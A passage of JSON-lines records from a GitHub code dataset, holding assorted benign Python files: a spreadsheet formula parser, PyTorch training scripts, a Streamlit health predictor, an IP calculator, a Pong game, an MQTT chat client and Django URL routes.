if token.matches(Token.FUNC, Token.OPEN):\n tokens.append(token)\n token = Token('(', Token.PAREN, Token.OPEN)\n\n elif token.matches(Token.FUNC, Token.CLOSE):\n token = Token(')', Token.PAREN, Token.CLOSE)\n\n elif token.matches(Token.ARRAY, Token.OPEN):\n tokens.append(token)\n tokens.append(Token('(', Token.PAREN, Token.OPEN))\n tokens.append(Token('', Token.ARRAYROW, Token.OPEN))\n token = Token('(', Token.PAREN, Token.OPEN)\n\n elif token.matches(Token.ARRAY, Token.CLOSE):\n tokens.append(token)\n token = Token(')', Token.PAREN, Token.CLOSE)\n\n elif token.matches(Token.SEP, Token.ROW):\n tokens.append(Token(')', Token.PAREN, Token.CLOSE))\n tokens.append(Token(',', Token.SEP, Token.ARG))\n tokens.append(Token('', Token.ARRAYROW, Token.OPEN))\n token = Token('(', Token.PAREN, Token.OPEN)\n\n elif token.matches(Token.PAREN, Token.OPEN):\n token.value = '('\n\n elif token.matches(Token.PAREN, Token.CLOSE):\n token.value = ')'\n\n tokens.append(token)\n\n output = []\n stack = []\n were_values = []\n arg_count = []\n\n # shunting yard start\n for token in tokens:\n\n if token.type == token.OPERAND:\n output.append(self.make_node(token))\n if were_values:\n were_values[-1] = True\n\n elif token.type != token.PAREN and token.subtype == token.OPEN:\n\n if token.type in (token.ARRAY, Token.ARRAYROW):\n token = Token(token.type, token.type, token.subtype)\n\n stack.append(token)\n arg_count.append(0)\n if were_values:\n were_values[-1] = True\n were_values.append(False)\n\n elif token.type == token.SEP:\n\n while stack and (stack[-1].subtype != token.OPEN):\n output.append(self.make_node(stack.pop()))\n\n if not len(were_values):\n raise FormulaParserError(\n \"Mismatched or misplaced parentheses\")\n\n were_values.pop()\n arg_count[-1] += 1\n were_values.append(False)\n\n elif token.is_operator:\n\n while stack and stack[-1].is_operator:\n if token.precedence < stack[-1].precedence:\n output.append(self.make_node(stack.pop()))\n else:\n break\n\n stack.append(token)\n\n elif 
token.subtype == token.OPEN:\n assert token.type in (token.FUNC, token.PAREN, token.ARRAY)\n stack.append(token)\n\n elif token.subtype == token.CLOSE:\n\n while stack and stack[-1].subtype != Token.OPEN:\n output.append(self.make_node(stack.pop()))\n\n if not stack:\n raise FormulaParserError(\n \"Mismatched or misplaced parentheses\")\n\n stack.pop()\n\n if stack and stack[-1].is_funcopen:\n f = self.make_node((stack.pop()))\n f.num_args = arg_count.pop() + int(were_values.pop())\n output.append(f)\n\n else:\n assert token.type == token.WSPACE, \\\n 'Unexpected token: {}'.format(token)\n\n while stack:\n if stack[-1].subtype in (Token.OPEN, Token.CLOSE):\n raise FormulaParserError(\"Mismatched or misplaced parentheses\")\n\n output.append(self.make_node(stack.pop()))\n return output\n\n\n\n\n# if __name__ == \"__main__\":\n\n","repo_name":"tactycHQ/Saturn","sub_path":"Saturn/cell.py","file_name":"cell.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6115001455","text":"import torch\n\ndef validation_metrics (model, valid_dl, loss_func, device, accuracy_metric, y_to_device):\n \"\"\"Funkcija koja tvalidira model\n\n Arguments:\n model (:obj):\n Model koji zelimo trenirat.\n valid_dl (`DataLoader`):\n Data loader za validacijske podatke.\n loss_func (:obj):\n Loss funkcija kojom treniramo.\n device (:obj):\n Uredaj na kojem treniramo.\n accuracy_metric (:func):\n Funkcija kojom provjeravamo preciznost.\n y_to_device (:func):\n Funkcija kojom prebacujemo y na uredaj.\n\n Returns:\n `float`: Loss validacijskih podataka,\n `float`: Preciznost validacijskih podataka\n \"\"\"\n model.eval()\n accuracy = 0\n count = 0\n total = 0\n sum_loss = 0.0\n for x, y, l in valid_dl:\n x = x.long().to(device)\n y = y_to_device(y, device)\n y_hat = model(x, l)\n loss = loss_func(y_hat, y)\n #prima posebnu funkciju za preciznost jer ona ovisi o modelu\n accuracy += accuracy_metric(y_hat, y)\n total += x.shape[0]\n count += 1\n sum_loss += loss.item()*x.shape[0]\n return sum_loss/total, accuracy/total","repo_name":"lbuday/praksa-talentlyft","sub_path":"model_1/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2532782080","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\ndefine model \r\n\"\"\"\r\n\r\nimport torch\r\nimport torch.nn as nn\r\n\r\n# define cnn model \r\nclass cnn_autoencoder(nn.Module):\r\n def __init__(self):\r\n super(cnn_autoencoder, self).__init__()\r\n \r\n self.act = nn.ReLU()\r\n self.flat = nn.Flatten()\r\n self.sig = nn.Sigmoid()\r\n\r\n self.c1 = nn.Conv2d(1, 16, 3, stride=2, padding=1)\r\n self.c2 = nn.Conv2d(16, 32, 3, stride=2, padding=1)\r\n self.c3 = nn.Conv2d(32, 64, 7)\r\n\r\n self.t1 = nn.ConvTranspose2d(64, 32, 7)\r\n self.t2 = nn.ConvTranspose2d(32, 16, 3, stride=2, padding=1, output_padding=1)\r\n self.t3 = nn.ConvTranspose2d(16, 1, 3, stride=2, padding=1, output_padding=1)\r\n\r\n def forward(self, image):\r\n # encode image\r\n img = self.act(self.c1(image))\r\n img = self.act(self.c2(img))\r\n img = self.flat(self.c3(img))\r\n\r\n # decode image\r\n img = img.view(-1, 64, 1, 1)\r\n img = self.act(self.t1(img))\r\n img = self.act(self.t2(img))\r\n img = self.sig(self.t3(img))\r\n \r\n return 
img","repo_name":"assayer5/pytorch-image-clustering","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21160053011","text":"import torch\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom torch import nn, optim\n\nfrom Lenet5 import Lenet5\n\n\ndef main():\n batchsz = 128\n lr = 1e-3\n epochs = 1000\n\n cifar_train = datasets.CIFAR10('./data/cifar',\n train=True,\n download=True,\n transform=transforms.Compose([\n transforms.Resize((32, 32)),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ]))\n cifar_test = datasets.CIFAR10('./data/cifar',\n train=False,\n download=True,\n transform=transforms.Compose([\n transforms.Resize((32, 32)),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ]))\n\n cifar_train = torch.utils.data.DataLoader(cifar_train,\n batch_size=batchsz,\n shuffle=True)\n cifar_test = torch.utils.data.DataLoader(cifar_test,\n batch_size=batchsz,\n shuffle=True)\n\n x, label = iter(cifar_train).next()\n print('x:', x.shape, 'label:', label.shape)\n\n model = Lenet5()\n criteon = nn.CrossEntropyLoss()\n optimzer = optim.Adam(model.parameters(), lr=lr)\n\n print(model)\n\n for epoch in range(epochs):\n\n model.train()\n for batchidx, (x, label) in enumerate(cifar_train):\n\n # forward propagation\n logits = model(x)\n # logits: [b, 10]\n # label: [b]\n # loss: tensor scalar\n loss = criteon(logits, label)\n\n # back propagation\n optimzer.zero_grad()\n loss.backward()\n optimzer.step()\n\n print('epoch: ', epoch, 'loss: ', loss.item())\n\n model.eval()\n with torch.no_grad():\n total_correct = 0\n total_num = 0\n\n for x, label in cifar_test:\n logits = model(x)\n\n pred = logits.argmax(dim=1)\n\n correct = torch.eq(pred, label).float().sum().item()\n total_correct += correct\n total_num += x.size(0)\n\n acc = total_correct / total_num\n print('epoch: ', epoch, 'test acc: ', acc)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"luninsun/PyTorch-Learning","sub_path":"Lenet5Demo.py","file_name":"Lenet5Demo.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14356139261","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport pickle\n\nst.write(\"\"\"\n# Heart Disease Prediction App\n\"\"\")\n\nst.sidebar.header('User Input Features')\n\nGeneral_Health = st.sidebar.selectbox(\n 'General_Health', ('Poor', 'Very Good', 'Good', 'Fair', 'Excellent'))\nCheckup = st.sidebar.selectbox('Checkup', ('Within the past 2 years', 'Within the past year', '5 or more years ago',\n 'Within the past 5 years', 'Never'))\nExercise = st.sidebar.selectbox('Exercise', ('No', 'Yes'))\nSkin_Cancer = st.sidebar.selectbox('Skin_Cancer', ('No', 'Yes'))\nOther_Cancer = st.sidebar.selectbox('Other_Cancer', ('No', 'Yes'))\nDepression = st.sidebar.selectbox('Depression', ('No', 'Yes'))\nDiabetes = st.sidebar.selectbox('Diabetes', ('No', 'Yes', 'No, pre-diabetes or borderline diabetes',\n 'Yes, but female told only during pregnancy'))\nArthritis = st.sidebar.select_slider('Arthritis', ('No', 'Yes'))\nSex = st.sidebar.selectbox('Sex', ('Female', 'Male'))\nAge_Category = st.sidebar.selectbox('Age_Category', ('70-74', '60-64', '75-79', '80+', '65-69', '50-54', '45-49', '18-24', '30-34',\n '55-59', 
'35-39', '40-44', '25-29'))\n# st.sidebar.slider takes (label, min_value, max_value, default); the default must lie inside the range\nBMI = st.sidebar.slider('BMI', 10, 100, 60)\nSmoking_History = st.sidebar.selectbox('Smoking_History', ('Yes', 'No'))\nAlcohol_Consumption = st.sidebar.slider('Alcohol_Consumption', 0.0, 40.0, 20.0)\nFruit_Consumption = st.sidebar.slider('Fruit_Consumption', 0.0, 120.0, 60.0)\nGreen_Vegetables_Consumption = st.sidebar.slider(\n    'Green_Vegetables_Consumption', 0.0, 140.0, 70.0)\nFriedPotato_Consumption = st.sidebar.slider(\n    'FriedPotato_Consumption', 0.0, 140.0, 70.0)\n\ndata = {\n    'General_Health': General_Health,\n    'Checkup': Checkup,\n    'Exercise': Exercise,\n    'Skin_Cancer': Skin_Cancer,\n    'Other_Cancer': Other_Cancer,\n    'Depression': Depression,\n    'Diabetes': Diabetes,\n    'Arthritis': Arthritis,\n    'Sex': Sex,\n    'Age_Category': Age_Category,\n    'BMI': BMI,\n    'Smoking_History': Smoking_History,\n    'Alcohol_Consumption': Alcohol_Consumption,\n    'Fruit_Consumption': Fruit_Consumption,\n    'Green_Vegetables_Consumption': Green_Vegetables_Consumption,\n    'FriedPotato_Consumption': FriedPotato_Consumption\n}\n\ninput_df = pd.DataFrame(data, index=[0])\ndf_new = pd.read_csv('CVD_newfile.csv')\ndf_new.drop(columns=df_new.columns[0], axis=1, inplace=True)\ndf_new.drop('Heart_Disease', axis=1, inplace=True)\ndf = pd.concat([input_df, df_new], axis=0)\n\ncategorical = df.select_dtypes(include=['object']).columns.sort_values()\n# categorical=categorical.drop('Heart_Disease')\n# df.drop(['Height_(cm)','Weight_(kg)'], axis=1, inplace=True)\n\nfor col in categorical:\n    dummy = pd.get_dummies(df[col], prefix=col)\n    df = pd.concat([df, dummy], axis=1)\n    del df[col]\ndf = df[:1]\n\nst.subheader('User Input features')\nst.write(df)\n\nload_model = pickle.load(open('heart_model_1.pkl', 'rb'))\n\n# Apply model to make predictions\npreds = load_model.predict(df)\nprediction = (preds > 0.5).astype(int)\n\nprediction_proba = load_model.predict_proba(df)\n\nst.subheader('Prediction')\nheart_disease = np.array(['No', 'Yes'])\nst.write(heart_disease[prediction])\n\nst.subheader('Prediction Probability')\nst.write(prediction_proba)\n","repo_name":"iaf12/Heart_Disease_Risk_Prediction_With_Streamlit","sub_path":"heart_app.py","file_name":"heart_app.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73897460391","text":"from app.elastic.connect import connect_elasticsearch\n\n\ndef create_geo_mapping():\n    \"\"\"Create the geo mapping.\"\"\"\n    mapping = {\n        \"mappings\": {\n            \"properties\": {\n                \"pin\": {\n                    \"properties\": {\n                        \"location\": {\n                            \"type\": \"geo_point\"\n                        }\n                    }\n                }\n            }\n        }\n    }\n    es = connect_elasticsearch()\n    es.indices.create(index=\"michelin_restaurants\", body=mapping)\n\n\nif __name__ == \"__main__\":\n    create_geo_mapping()\n","repo_name":"johannesocean/elastic","sub_path":"app/elastic/load/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13590145437","text":"import numpy as np\ndef load(fname):\n    z = []\n    for epoch in range(1,51):\n        w = np.load(fname+'/w_sample_'+str(epoch)+'.npy',allow_pickle=True)[1]\n        z.append(w)\n\n    z = np.array(z)\n\n    zz = np.transpose(z, (1,2,4,3,0))\n    zz = zz.reshape((zz.shape[0]*zz.shape[1]*zz.shape[2],zz.shape[3],-1))\n    return zz\n\ndef converiance(x,y):\n    x -= np.mean(x)\n    y -= np.mean(y)\n    z = (np.mean(x*y))/(np.sqrt(np.mean(x*x)*np.mean(y*y)))\n    if z==float('Inf') or z==-float('Inf'):\n        return 1\n    else:\n        
return z\n\nsplit = 4 \n\nlr_ = [0.1, 0.03]\ndrop_rate_ = [0.0, 0.15, 0.3]\nwidth_ = [1., 0.5]\nbatch_size_ = [64, 256]\nweight_decay_ = [0.0, 0.0005]\n\nact = 'relu'\nfor net in ['vgg11_relu/','vgg16_relu/','vgg19_relu/']:\n sampling_det = []\n for weight_decay in weight_decay_:\n for drop_rate in drop_rate_:\n for width in width_:\n for batch_size in batch_size_:\n for lr in lr_:\n fname = net+str(lr)+'_'+str(drop_rate)+'_'+str(width)+'_'+str(batch_size)+'_'+str(weight_decay)+'_'+str(act) \n zz = load(fname) \n det = []\n for zzz in zz[:400]:\n deet = 0\n for i in range(int(len(zzz)/split)):\n corr = np.ones((split,split))\n for x in range(split):\n for y in range(split):\n if x!=y:\n corr[x][y]=converiance(zzz[x+i*split],zzz[y+i*split])\n deet += np.linalg.det(corr)\n if not np.isnan(deet):\n det.append(deet*split/len(zzz))\n\n det = np.array(det) \n if np.isnan(np.mean(det)):\n sampling_det.append(0.4)\n else:\n sampling_det.append(np.mean(det))\n print('complete '+fname)\n np.save(net+'sampling_det.npy',np.array(sampling_det))","repo_name":"Alexkael/Weight_Expansion","sub_path":"Experiment_5.2/VGG_CIFAR10/rawdata/sampling_det.py","file_name":"sampling_det.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73470199273","text":"import Decimal\n\n\ndef DecBin(Transformar):\n Lista = Transformar.split('.')\n\n Transformado = '' # string de ip binario\n j = 3 # 4 octeto\n while j >= 0:\n # Seleciona o octeto\n temp = int(Lista[j]) # transforma um pedaço do octeto em inteiro decimal\n i = 7 # 8 bits\n while i >= 0:\n # Gerador do binario por octeto\n Bit = int(temp % 2) # coleta o inteiro do mod\n Transformado = str(Bit) + Transformado # concatena o resultado na string\n temp = temp / 2 # captura o proximo numero a ser transformado em 0 ou 1\n i = i - 1\n if j != 0:\n Transformado = '.' 
+ Transformado # string armazenadora\n j = j - 1\n\n return Transformado\n\n\ndef BinIP(IP):\n return DecBin(IP)\n\n\ndef BinMask(CIDR):\n # calcula a mascara para uma string binaria\n m = 0\n contador = 0\n maskbin = '' # string de mascara binaria\n\n while m < 32:\n if contador == 8: # separa o octeto\n maskbin = maskbin + '.'\n contador = 0\n\n # Verifica se o bit vai ser 0 ou 1\n if m <= int(CIDR - 1):\n maskbin = maskbin + '1'\n else:\n maskbin = maskbin + '0'\n\n m = m + 1\n contador = contador + 1\n return maskbin\n\n\ndef BinWild(CIDR):\n # calcula a mascara para uma string binaria\n m = 0\n contador = 0\n wildbin = '' # string de wildcard binaria\n\n while m < 32:\n if contador == 8: # separa o octeto\n wildbin = wildbin + '.'\n contador = 0\n\n # Verifica se o bit vai ser 0 ou 1\n if m <= int(CIDR - 1):\n wildbin = wildbin + '0'\n else:\n wildbin = wildbin + '1'\n\n m = m + 1\n contador = contador + 1\n return wildbin\n\n\ndef BinBroad(IP, CIDR):\n return DecBin(Decimal.DecBroadcast(IP, CIDR))\n\n\ndef BinHostMin(IP, CIDR):\n return DecBin(Decimal.DecHostMin(IP, CIDR))\n\n\ndef BinHostMax(IP, CIDR):\n return DecBin(Decimal.DecHostMax(IP, CIDR))\n\n\ndef BinNetwork(IP, CIDR):\n ip = BinIP(IP).split('.')\n mask = BinMask(CIDR).split('.')\n network = ''\n\n j = 3 # 4 octeto\n while j >= 0:\n # Seleciona o octeto\n tempip = (ip[j]) # transforma um pedaço do octeto em inteiro decimal\n tempmask = (mask[j]) # transforma um pedaço do octeto em inteiro decimal\n i = 7 # 8 bits\n while i >= 0:\n if tempip[i] == '1' and tempmask[i] == '1':\n network = '1' + network\n else:\n network = '0' + network\n i = i - 1\n if j != 0:\n network = '.' + network # string armazenadora\n j = j - 1\n return network\n","repo_name":"andrelteixeira/IPcalc-Calcuradora_de_IP","sub_path":"Binarios.py","file_name":"Binarios.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70154206314","text":"import flask\nimport requests\nimport urllib\n\nfrom .app import app\nfrom .helpers import (\n api_host,\n redirect,\n)\n\n\ndef api_call(method, path, params=None, json=None, session=None, return_errors=False):\n url = api_host() + \"/\" + \"/\".join(urllib.parse.quote(p, safe=\"\") for p in path)\n headers = None\n if session and session.api_token:\n headers = {\"Authorization\": \"Bearer \" + session.api_token}\n\n error_response = redirect(\"error\", message=\"API call failed; sorry for the inconvenience\")\n try:\n r = method(url, params=params, headers=headers, json=json)\n\n success = r.status_code in (200, 201, 204)\n if not success:\n app.logger.warning(\"API failed: {} {}\".format(r.status_code, r.text))\n\n if success:\n result = None\n try:\n result = r.json()\n except Exception:\n result = None\n if return_errors:\n return (result, None)\n else:\n return result\n elif r.status_code == 404:\n if return_errors:\n return (None, \"Data not found\")\n error_response = redirect(\"error\", message=\"Data not found\")\n elif r.status_code == 400 and path[0] == \"server\":\n error_response = redirect(\"error\", message=\"Unknown server\")\n elif return_errors:\n error = str(r.json().get(\"errors\", \"API call failed\"))\n return (None, error)\n except Exception:\n # If anything failed we did not capture, return the latest error we\n # have to the caller.\n pass\n\n if not return_errors:\n flask.abort(error_response)\n\n return (None, \"API call failed\")\n\n\ndef api_get(*args, **kwargs):\n return 
api_call(requests.get, *args, **kwargs)\n","repo_name":"OpenTTD/master-server-web","sub_path":"webclient/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15039490539","text":"N = int(input())\r\nH = [0]*N\r\nS = [0]*N\r\n \r\nfor i in range(N):\r\n H[i], S[i] = map(int, input().split())\r\n \r\ndef check_P(p):\r\n #???P????????????????\r\n #p???????????????????????\r\n T = [0]*N\r\n for i in range(N):\r\n T[i] = int((p - H[i]) / S[i])\r\n sorted_index_T = sorted(range(len(T)), key=lambda k: T[k])\r\n for (k,i) in enumerate(sorted_index_T):\r\n if (T[i] < k):\r\n return False\r\n return True\r\n \r\n#p?2??????\r\nP_low = 0\r\nP_high = 0\r\nfor i in range(N):\r\n p = H[i]\r\n if (P_low < p):\r\n P_low = p\r\n p = H[i] + S[i]*(N-1)\r\n if (P_high < p):\r\n P_high = p\r\nP_low -= 1\r\n\r\nwhile(True):\r\n P_now = int((P_low + P_high) / 2)\r\n #print(_, P_low, P_now, P_high)\r\n \r\n if (check_P(P_now)):\r\n P_high = P_now\r\n else:\r\n P_low = P_now\r\n if (P_high <= (P_low + 1)):\r\n print(P_high)\r\n break","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc023/D/3997044.py","file_name":"3997044.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"20841166862","text":"# 2x3の配列に行を追加する\nimport numpy as np\n\n\na = np.array([ 1, 2, 3, 4, 5, 6]).reshape(2, 3)\nprint(a)\n\nb = np.append(a, [[7, 8, 9]], axis=0)\n# [[7, 8, 9]] 配列aに合わせて2次元配列で追加する\n# axis=0 行を追加する\nprint(b)\n\"\"\"\n配列に要素を追加する\nappend(配列, 値, axis=None)\nappend(配列, リスト, axis=None)\nappend(配列, タプル, axis=None)\n\"\"\"\n","repo_name":"natume5/rensyuuyou","sub_path":"python3 Guide note Sample/chapter15/Section15-1/2x3の配列に行を追加する.py","file_name":"2x3の配列に行を追加する.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44318093535","text":"from flask.ext.wtf import Form\nfrom wtforms import StringField, TextAreaField\nfrom wtforms.validators import DataRequired\nfrom flask_wtf.file import FileField, FileRequired, FileAllowed\n\nclass PostForm(Form):\n\ttitle = StringField('title', validators=[DataRequired()])\n\temail = StringField('email')\n\tname = StringField('name')\n\tbody = TextAreaField('body', validators=[DataRequired()])\n\tfile = FileField('file', validators=[FileRequired(), FileAllowed(['jpg', 'jpeg', 'png', 'gif'])])\n\t\nclass ReplyForm(Form):\n\ttitle = StringField('title')\n\temail = StringField('email')\n\tname = StringField('name')\n\tbody = TextAreaField('body', validators=[DataRequired()])\n\tfile = FileField('file', validators=[FileAllowed(['jpg', 'jpeg', 'png', 'gif'])])\n","repo_name":"bobquest33/imageboard","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39635564719","text":"from mock import Mock\nfrom nose.tools import assert_equal\n\nfrom ..common import RPCClientProxy, Call\n\nclass TestRPCClientProxy(object):\n def test_calling(self):\n c = Mock()\n sc = RPCClientProxy(client=c)\n sc.foo(1, bar=2)\n call = c.call.call_args[0][0]\n assert_equal((call.args, call.kwargs), ((1, ), {\"bar\": 2}))\n\n def test_repr(self):\n c = Mock()\n sc = RPCClientProxy(client=c)\n assert_equal(\n repr(sc.prefix),\n \"<RPCClientProxy client=%r 
prefix='prefix'>\" %(c, )\n )\n\nclass TestCall(object):\n def test_repr(self):\n c = Call(\"foo\", kwargs={\"stuff\": 42})\n assert_equal(\n repr(c),\n \"Call('foo', kwargs={'stuff': 42})\",\n )\n","repo_name":"taavi/dirt","sub_path":"dirt/rpc/tests/test_common.py","file_name":"test_common.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71861826473","text":"from turtle import Screen\nfrom table import Table\nfrom paddle import Paddle\nfrom ball import Ball\nfrom scoreboard import Scoreboard\nimport time\n\n\nscreen = Screen()\nscreen.setup(width=800, height=400)\nscreen.title(\"Pong Game\")\nscreen.bgcolor(\"black\")\nscreen.tracer(0)\n\ntable = Table()\nr_paddle = Paddle((380, 0))\nl_paddle = Paddle((-380, 0))\nball = Ball()\nscoreboard = Scoreboard()\n\n\nscreen.listen()\nscreen.onkey(r_paddle.up, \"Up\")\nscreen.onkey(r_paddle.down, \"Down\")\nscreen.onkey(l_paddle.up, \"w\")\nscreen.onkey(l_paddle.down, \"s\")\n\n\nis_game_on = True\nwhile is_game_on:\n time.sleep(0.1)\n screen.update()\n ball.start_move()\n\n # Detect collision with wall.\n if ball.ycor() > 180 or ball.ycor() < -180:\n ball.bounce_y()\n\n # Detect collision with paddle.\n if ball.distance(r_paddle) < 30 or ball.distance(l_paddle) < 30:\n ball.bounce_x()\n\n # Detect collision with right miss.\n if ball.xcor() > 390:\n ball.reset_position()\n scoreboard.l_point()\n\n # Detect collision with left miss.\n if ball.xcor() < -390:\n ball.reset_position()\n scoreboard.r_point()\n\n\nscreen.exitonclick()\n","repo_name":"AbdulMuhaimin-1/Python_Intermediate","sub_path":"pong_game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"72278507114","text":"from manejoCliente import Cliente\nfrom manejoCliente import InvalidUser\nfrom manejoCliente import Seleccion_invalida\nimport logging\nfrom globals import *\n\n#JDCP A MI ME TOCO TCP POR ESO NO HAY MUCHOS COMENTARIOS DE MI PARTE EN ESTE CODIGO XD\n#JICM A MI ME TOCO MANEJO DE INSTRUCCIONES, POR ESO TAMPOCO MUCHOS COMENTARIOS MIOS EN ESTE CODIGO XD\n\n#DAHM Constantes a utilizar en la interfaz importadas de globals.py\ngrupo = GROUP_ID\naudio = FILENAME\n\n#DAHM Creacion de instancia de la clase Cliente la cual tiene ya todos los argumentos por defecto importados de globals.py\nuser = Cliente()\n#DAHM Se configura para que se pueda conectar a un broker MQTT\nuser.configMQTT()\n#DAHM Se conecta al broker\nuser.conectar()\n#DAHM Se subscribe a los topicos detectados de los .txt\nuser.subscripcion()\n\n#DAHM El metodo topicos retorna una lista de tuplas con los topicos y el QoS entonces lo desplegamos al inicio del menu\ndestinos = user.topicos()\nlogging.info(('---------- TOPICOS A LOS QUE SE ESTA SUBSCRITO -------- '))\nfor destino in destinos:\n #DAHM Desplegamos solo el primer argumento ya que a un usuario final no le interesa el QoS, de esta manera\n #DAHM el usuario sabe de donde puede recibir mensajes o audios \n logging.info((destino[0]))\n\ntry:\n while True:\n opcion1 = input('1) Enviar texto\\n2) Enviar mensaje de voz\\n')\n try:#JDCP VERIFICA QUE SE INGRESE UNA OPCION CORRECTA , EN CASO CONTRARIO REINICIA EL PROGRAMA\n if opcion1 == '1':\n opcion2 = input('a. Enviar a usuario\\nb. 
Enviar a sala\\n')\n if opcion2 == 'a':\n #JICM levantar excepcion si el usuario es invalido\n try:\n usuario = input('A que usuario desea enviar el mensaje?\\n')\n int(usuario)\n if len(usuario)!=9:\n raise InvalidUser\n mensaje = input('Escriba su mensaje:\\n')\n user.publicar('usuarios/' + usuario, mensaje)\n #JICM manejo de la excepción si el usuario es invalido, para que se reinicie el programa\n #en vez de cerrarse por completo \n except (InvalidUser, ValueError):\n logging.error('el usuario debe de ser de 9 números')\n\n elif opcion2 == 'b':\n sala = input('A que sala desea enviar el mensaje?\\n')\n #JDCP ESTO VERIFICA QUE EL FORMATO DE LA SALA INGRESADA SEA VALIDA\n try:\n #JDCP SE VERIFICA QUE ESTE INGRESANDO UN NUMERO Y NO LETRAS \n if(sala.isdigit()):\n mensaje = input('Escriba su mensaje:\\n')\n user.publicar('salas/' + grupo + '/S' + sala, mensaje)\n else:\n raise Seleccion_invalida\n #JDCP SI EL USUARIO COMETE EL ERROR DE INGRESAR CARACTERES NO NUMERICOS\n except (Seleccion_invalida,ValueError):\n logging.error('solo se admiten valores numericos en la direccion de la sala \\n')\n else:\n raise Seleccion_invalida\n \n\n elif opcion1 == '2':\n opcion2 = input('a. Enviar a usuario\\nb. Enviar a sala\\n')\n if opcion2 == 'a':\n #JICM levantar excepción si el usuario es invalido\n try:\n #JDCP LE DICE AL USUARIO QUE INGRESE LOS PARAMETROS DEL AUDIO\n usuario = input('A que usuario desea enviar el audio?\\n')\n int(usuario)\n if (len(usuario)!=9):\n raise InvalidUser\n duracion = input('Ingrese duracion del audio: \\n')\n #JDCP hilo para grabar y enviar\n user.hilo_enviarAudio(audio, duracion, usuario)\n #JICM manejo de la excepción si el usuario es invalido, para que se reinicie el programa\n #en vez de cerrarse por completo\n except (InvalidUser, ValueError):\n logging.error('el usuario debe de ser de 9 números')\n\n elif opcion2 == 'b':\n try:\n sala = input('A que sala desea enviar el audio?\\n')\n if (sala.isdigit()):\n duracion = input('Ingrese duracion del audio: \\n')\n #JICM se configura para que envíe correctamente a las salas\n user.hilo_enviarAudio(audio, duracion,\"S\"+sala)\n else:\n raise Seleccion_invalida\n #JDCP SI EL USUARIO COMETE EL ERROR DE INGRESAR CARACTERES NO NUMERICOS\n except (Seleccion_invalida,ValueError):\n logging.error('solo se admiten valores numericos en la direccion de la sala \\n')\n else:\n raise Seleccion_invalida\n \n else:\n #JDCP LEVANTA ERRO SI EL USUARIO NO SELECCIONA LA OPCIONES PROPUESTAS\n raise Seleccion_invalida\n except (Seleccion_invalida,ValueError):\n #JDCP SE MUESTRA AL USUARIO QUE HA INGRESADO UN DATO INVALIDO\n logging.error('data invalido, Ingrese una de las siguiente opciones : \\n')\n\n#DAHM El usuario solo puede finalizar el programa con interrupcion ctrl+c\nexcept KeyboardInterrupt:\n #DAHM Se llama el metodo que desconecta del broker MQTT a la instancia\n user.desconectar()\n logging.info('desconectado del broker!')","repo_name":"usac201700386/parcial2","sub_path":"cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":5765,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12035298532","text":"from django.urls import path\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nfrom . 
import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"listings/create\", views.create_listing, name=\"create_listing\"),\n path(\"listings/<int:listing_id>\", views.display_listing, name=\"display_listing\"),\n path(\"listings/<int:listing_id>/close\", views.close_listing, name=\"close_listing\"),\n path(\"watchlist/<int:listing_id>\", views.add_to_watchlist, name=\"add_to_watchlist\"),\n path(\"watchlist\", views.watchlist, name=\"watchlist\"),\n path(\"category\", views.category, name=\"category\"),\n path(\"category/<str:category>\", views.display_listing_category, name=\"display_listing_category\")\n]\n\nurlpatterns += static(settings.MEDIA_URL, 